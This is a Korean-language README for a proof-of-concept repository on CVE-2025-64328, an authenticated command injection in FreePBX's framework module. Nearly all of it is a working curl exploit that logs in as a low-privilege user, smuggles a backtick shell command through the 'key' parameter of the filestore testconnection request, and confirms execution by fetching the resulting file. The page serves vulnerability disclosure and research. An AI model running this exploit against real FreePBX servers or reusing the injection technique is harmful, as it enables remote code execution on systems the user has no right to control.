
CVE-2025-64328 FreePBX framework 모듈의 인증된 명령 주입
framework 모듈의 인증된 명령 주입CVE-2025-64328 FreePBX framework 모듈의 인증된 명령 주입에 대한 간단한 개념 증명(PoC) 저장소입니다.
전체 분석 글: https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/
curl 개념 증명$ curl -s \
-XPOST --cookie-jar /tmp/freepbx-cookie --data 'username=lowprivuser&password=<lowprivuserpassword>' http://192.168.122.206/admin/config.php -o /dev/null \
--next \
--cookie /tmp/freepbx-cookie -H 'Referer: http://192.168.122.206' 'http://192.168.122.206/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user=asdf&port=22&key=asdf`echo%20rcetest2>/var/www/html/rcetest.txt`&path=test' | jq
{
"status": true,
"message": "Login failed"
}
$ curl -sk http://192.168.122.206/rcetest.txt
rcetest2